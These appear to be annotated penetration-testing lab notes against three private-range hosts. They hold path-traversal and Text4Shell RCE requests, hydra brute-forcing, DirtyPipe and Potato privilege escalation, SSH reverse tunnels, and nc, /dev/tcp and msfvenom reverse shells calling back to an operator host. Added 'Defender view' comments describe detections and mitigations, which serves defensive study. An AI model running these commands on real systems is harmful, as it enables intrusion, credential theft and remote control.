Misc
# Host 192.168.231.149: the web (cgi-bin), ftp and ssh services are probed here.
# The request below POSTs a shell command as the body to a URL made of
# URL-encoded dot segments ("%2e%2e") beneath /cgi-bin/; --path-as-is keeps
# curl from normalising the path, so the server sees the traversal verbatim.
# Defender view: encoded ".." segments under /cgi-bin/ in access logs are a
# high-signal indicator; server-side path normalisation and patching the web
# server are the mitigation.
# NOTE(review): the trailing "$2" is a shell positional parameter and expands
# to empty when this line is run on its own — presumably a paste artifact.
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; whoami" "192.168.231.149/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2";
# Online password guessing against one account ("kiero") over ftp and ssh with
# the rockyou wordlist.
# Defender view: this produces a burst of authentication failures for a single
# username from a single source — lockout / rate limiting and key-only SSH
# make it ineffective and easy to alert on.
hydra -l kiero -P /usr/share/wordlists/rockyou.txt ftp://192.168.231.149
hydra -l kiero -P /usr/share/wordlists/rockyou.txt ssh://192.168.231.149
# Offline cracking of an SSH private-key passphrase hash (id_rsa.hash) with the
# same wordlist; only relevant once the key file itself has been obtained.
# Defender view: a wordlist passphrase adds no protection to an exposed key —
# treat any leaked private key as compromised and rotate it.
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
CVE-2022-0847 (DirtyPipe)
# Fetches exploit source (50808.c) from 192.168.45.166 — the same address used
# as LHOST further down, i.e. the operator's machine — and compiles it on the
# target, so gcc must be present on the box.
# Defender view: an outbound HTTP fetch of a .c file followed by a compiler run
# on a server is unusual by itself; the underlying issue (CVE-2022-0847 per the
# heading above) is a kernel bug, so the real mitigation is a patched kernel.
curl http://192.168.45.166/50808.c -o priv.c
gcc priv.c -o exploit1
# Enumerates set-uid binaries; one of them (RESET_PASSWD) is then handed to
# the compiled exploit as its argument.
# Defender view: file-integrity monitoring on set-uid binaries catches the
# modification this exploit presumably performs on its target file (inferred
# from the argument — the exploit source is not shown here).
find / -perm -4000 2>/dev/null
./exploit1 /home/john/RESET_PASSWD
---------------
# Host 192.168.245.150:8080 — the "query" parameter of /search is used to get a
# ${script:javascript:...} interpolation evaluated server-side (the decoded
# payloads below call java.lang.Runtime.getRuntime().exec). textshell2.py is a
# local helper (not shown) that wraps the same mechanism.
# Defender view: the encoded prefix "%24%7Bscript%3A" (= "${script:") in a
# query string is an unambiguous log indicator; disable script lookups in the
# interpolating library / upgrade it, and never feed user input into it.
python textshell2.py -u 'http://192.168.245.150:8080/search?query=' -c 'whoami' -m 'rce'
# Listens on the VPN interface for the ICMP callback the first request below
# should produce — a blind-RCE confirmation step.
sudo tcpdump -i tun0
# Three staged requests: ping back (confirmation), wget a script into /tmp,
# execute it. The last two lines differ only in whether the " HTTP/1.1" suffix
# is URL-encoded — presumably a raw request line copied out of a proxy.
# Defender view: outbound ICMP/HTTP from an application server to an unknown
# host right after a suspicious request, plus a new file in /tmp, are the
# detections.
http://192.168.245.150:8080/search?query=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime().exec(%27ping%20192.168.45.166%27)%7D HTTP/1.1
http://192.168.245.150:8080/search?query=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime().exec(%27wget%20192.168.45.166/testshell%20-O%20/tmp/testshell%27)%7D HTTP/1.1
http://192.168.245.150:8080/search?query=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime().exec(%27sh%20/tmp/testshell%27)%7D HTTP/1.1
http://192.168.245.150:8080/search?query=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime().exec(%27sh%20/tmp/testshell%27)%7D%20HTTP/1.1
# Remote port-forward from the compromised host back to the operator machine
# (the user@host part is redacted as "[email protected]" in this copy; the
# authorized_keys path below shows the destination is the kali box). Run on
# the target, -R 5555:127.0.0.1:8000 makes the target's loopback port 8000
# reachable as port 5555 on the SSH server side. The two -o options suppress
# host-key prompts.
# Defender view: an outbound SSH session from an application server is itself
# the alert; egress filtering on port 22 breaks the tunnel.
ssh -R 5555:127.0.0.1:8000 -vv -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null [email protected]
# Key-based variant of the same tunnel: a keypair is generated, the public key
# is appended to the operator's (kali) authorized_keys, and the private key is
# fetched onto the target so the session needs no password prompt.
ssh-keygen -t rsa -f ~/.ssh/id_rsa
cat ~/.ssh/id_rsa.pub >> /home/kali/.ssh/authorized_keys
wget http://192.168.45.166/id_rsa -O id_rsa
ssh -i id_rsa -R 5555:127.0.0.1:8000 -vv -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null [email protected]
# Through the tunnel, 127.0.0.1:5555 on the operator side now reaches the
# target's port 8000. The banner scan and the jdwp-shellifier runs indicate
# that port is a Java Debug Wire Protocol (JDWP) listener, which the tool uses
# to spawn a process. The four invocations differ only in the command spawned
# (a bind shell on 1234 vs. reverse shells to 192.168.45.166:2233); the
# leading "$ " is a pasted prompt, not part of the command.
# Defender view: a JVM must not expose JDWP in production even on loopback —
# a local foothold plus a tunnel, as shown here, is enough to reach it. Audit
# running JVMs for debug agents.
nmap -sV -Pn -n -p 5555 --script=banner 127.0.0.1
$ python ./jdwp-shellifier.py -t 127.0.0.1 -p 5555 --cmd "ncat -v -l -p 1234 -e /bin/bash"
$ python ./jdwp-shellifier.py -t 127.0.0.1 -p 5555 --cmd "nc -e /bin/bash 192.168.45.166 2233"
$ python ./jdwp-shellifier.py -t 127.0.0.1 -p 5555 --cmd "ncat -v -l -p 1234 -e /bin/bash"
$ python ./jdwp-shellifier.py -t 127.0.0.1 -p 5555 --cmd "bash -c 'bash -i >& /dev/tcp/192.168.45.166/2233 0>&1'"
# Post-exploitation enumeration: linpeas.sh and 41154.sh (presumably the
# exploit-suggester whose "[+] [CVE-...]" findings are listed below) are
# fetched from the operator host.
# Defender view: downloads of these well-known scripts into /tmp are routine
# detection content for EDR / auditd rules.
wget http://192.168.45.166/linpeas.sh -O /tmp/linpeas.sh
wget http://192.168.45.166/41154.sh -o lpe.sh
[+] [CVE-2021-3156] sudo Baron Samedit 2
[+] [CVE-2021-3156] sudo Baron Samedit
[+] [CVE-2021-4034] PwnKit
---------------------------------------------------------------------------------------------------------------------------------------------------------------------
# Host 192.168.245.151 (Windows). AutoRecon is an automated enumeration script;
# free.py is a local helper (not shown) that runs a single command on the
# target — its first use only reads a file from a user's Desktop.
python3 ~/Downloads/AutoRecon-main/autorecon.py 192.168.245.151
python3 free.py 192.168.245.151 'type c:\users\chris\Desktop\local.txt'
# Builds a reverse-shell executable calling back to 192.168.45.166:443
# (LHOST/LPORT identify the operator host), stages it on the target with
# certutil, then runs it.
# Defender view: certutil.exe with -urlcache -split -f and an http URL is a
# well-known living-off-the-land download pattern and a strong EDR/Sysmon
# signal; a world-writable c:\users\public used as a drop point is another.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.166 LPORT=443 -f exe -o 2shell.exe
python3 free.py 192.168.245.151 'certutil.exe -urlcache -split -f http://192.168.45.166/2shell.exe c:\users\public\2shell.exe'
python3 free.py 192.168.245.151 'c:\users\public\2shell.exe'
# From the resulting shell: winPEAS (privilege-escalation enumeration) is
# downloaded with PowerShell, and nc.exe opens a second reverse shell (-e cmd).
# Defender view: Invoke-WebRequest writing .exe files and nc.exe spawning cmd
# are standard detection rules; egress filtering on 1337/2337 blocks the
# callbacks.
iwr -uri http://192.168.45.166/winPEASx64.exe -Outfile wpeas.exe
.\nc.exe 192.168.45.166 1337 -e cmd
# SigmaPotato is fetched next — by its name a "Potato"-family local privilege
# escalation tool (inferred; only the download is visible here). The following
# command hands it yet another nc reverse shell to run.
# Defender view: service accounts holding impersonation privileges are the
# usual precondition for this tool family — review them and alert on
# downloads of known *Potato binaries.
iwr -uri http://192.168.45.166/SigmaPotato.exe -Outfile sp.exe
.\sp.exe "nc.exe 192.168.45.166 2337 -e cmd"Service Changes: